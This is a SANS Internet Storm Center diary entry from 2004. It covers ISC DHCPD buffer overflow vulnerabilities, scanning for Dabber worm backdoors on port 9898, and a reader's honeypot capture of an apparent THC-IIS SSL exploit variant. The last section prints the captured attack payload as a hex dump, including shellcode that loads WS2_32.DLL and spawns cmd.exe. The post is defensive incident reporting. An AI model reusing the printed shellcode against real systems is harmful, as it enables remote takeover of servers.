Threat Level: green Handler on Duty: Pedro Bueno

SANS ISC InfoSec Handlers Diary Blog


Sign Up for Free!   Forgot Password?
Log In or Sign Up for Free!

ISC DHCPD buffer overflow exploit code produced in the lab

Published: 2004-06-23
Last Updated: 2004-06-23 22:30:57 UTC
by George Bakos (Version: 1)
0 comment(s)
US-CERT yesterday released an advisory, while the Internet Software Consortium
(ISC) released updated software, addressing two vulnerabilities in ISC's
Dynamic Host Configuration Protocol server software. ISC DHCPD is included in
most Unix and Unix-like operating systems.

Joshua Wright of the SANS Institute has confirmed through demonstration
(internal-use only code) that at least one of the two buffer overflow
vulnerabilities is exploitable to deliver a denial of service attack, and most
likely root access with a little more work. It should be assumed that others
(read: "bad guys") are at least as diligent in their efforts to exploit these
vulnerabilities. Although we haven't yet had any reports of compromises
attributable to this, please update your systems and review your overall
defenses. As always, a little bit of prevention goes a long way. Be sure you
are filtering traffic at all network boundaries, be it with a firewall or
screening router, if feasible. 67/UDP is the listening port for DHCP servers,
and should be denied to any untrusted networks.

ISC DHCP 3.0.1rc12 and ISC DHCP 3.0.1rc13 appear to be the only vulnerable
versions. See http://www.us-cert.gov/cas/techalerts/TA04-174A.html for more
info and http://www.isc.org/index.pl?/sw/dhcp/ for software updates.

-------------------

Scanning for Dabber

-------------------

Over the past couple of days there has been a large rise in port 9898 activity
reported http://www.dshield.org/port_report.php?port=9898 . The Dabber worm
(which rides in on the coattails of Sasser) opens a listener on port 9898,
which is then probed by the attacking system to confirm its success. We're
unaware of any "counter-counter" worm that is looking for Dabber backdoors, but
I have seen a significant rise in scanning for it, as well. My honeypotted
networks have seen several sequential SYN "half-open" scans which return a RST
packet whenever the SYN is acknowledged.

Likely, someone is harvesting lists for later use. If anyone captures port 9898
activity other than SYN scanning, please pass that info along.

And the cycle continues.

----------

SSL Attack

----------

Jim Forster reported a possible variant on an existing SSL exploit. Can anyone else correlate against this?:

One of my HoneyPots was hit with what appears to be an altered strain of the THC-IIS SSL Exploit this morning.

#(4 - 55197) [2004-06-23 07:54:46] HoneyPot 443 TCP
IPv4: 64.144.15.152 -> **.***.***.***
hlen=5 TOS=0 dlen=391 ID=11410 flags=0 offset=0 TTL=114 chksum=*****
TCP: port=2557 -> dport: 443 flags=***AP*** seq=1215225933
ack=177711253 off=5 res=0 win=64240 urp=0 chksum=*****
Payload: length = 351

000 : 80 62 01 02 BD 00 01 00 01 00 16 8F 82 01 00 00 .b..............
010 : 00 EB 0F 46 49 52 45 50 4F 52 54 39 39 39 32 5E ...FIREPORT9992^
020 : BE 98 EB 25 89 DD D3 03 9C 0B 02 06 6C 59 6C 59 ...%........lYlY
030 : F8 1D 9C DE 8C D1 4C 70 D4 03 58 46 57 53 32 5F ......Lp..XFWS2_
040 : 33 32 2E 44 4C 4C 01 EB 05 E8 F9 FF FF FF 5D 83 32.DLL........].
050 : ED 2C 6A 30 59 64 8B 01 8B 40 0C 8B 70 1C AD 8B .,j0Yd...@..p...
060 : 78 08 8D 5F 3C 8B 1B 01 FB 8B 5B 78 01 FB 8B 4B x.._<.....[x...K
070 : 1C 01 F9 8B 53 24 01 FA 53 51 52 8B 5B 20 01 FB ....S$..SQR.[ ..
080 : 31 C9 41 31 C0 99 8B 34 8B 01 FE AC 31 C2 D1 E2 1.A1...4....1...
090 : 84 C0 75 F7 0F B6 45 09 8D 44 45 08 66 39 10 75 ..u...E..DE.f9.u
0a0 : E1 66 31 10 5A 58 5E 56 50 52 2B 4E 10 41 0F B7 .f1.ZX^VPR+N.A..
0b0 : 0C 4A 8B 04 88 01 F8 0F B6 4D 09 89 44 8D D8 FE .J.......M..D...
0c0 : 4D 09 75 BE FE 4D 08 74 17 FE 4D 24 8D 5D 1A 53 M.u..M.t..M$.].S
0d0 : FF D0 89 C7 6A 02 58 88 45 09 80 45 79 0C EB 82 ....j.X.E..Ey...
0e0 : 50 8B 45 04 35 93 93 93 93 89 45 04 66 8B 45 02 P.E.5.....E.f.E.
0f0 : 66 35 93 93 66 89 45 02 58 89 CE 31 DB 53 53 53 f5..f.E.X..1.SSS
100 : 53 56 46 56 FF D0 89 C7 55 58 66 89 30 6A 10 55 SVFV....UXf.0j.U
110 : 57 FF 55 E0 8D 45 88 50 FF 55 E8 55 55 FF 55 EC W.U..E.P.U.UU.U.
120 : 8D 44 05 0C 94 53 68 2E 65 78 65 68 5C 63 6D 64 .D...Sh.exeh\cmd
130 : 94 31 D2 8D 45 CC 94 57 57 57 53 53 FE CA 01 F2 .1..E..WWWSS....
140 : 52 94 8D 45 78 50 8D 45 88 50 B1 08 53 53 6A 10 R..ExP.E.P..SSj.
150 : FE CE 52 53 53 53 55 FF 55 F0 6A FF FF 55 E4 ..RSSSU.U.j..U.

Thanks, Jim!
Keywords:
0 comment(s)
Diary Archives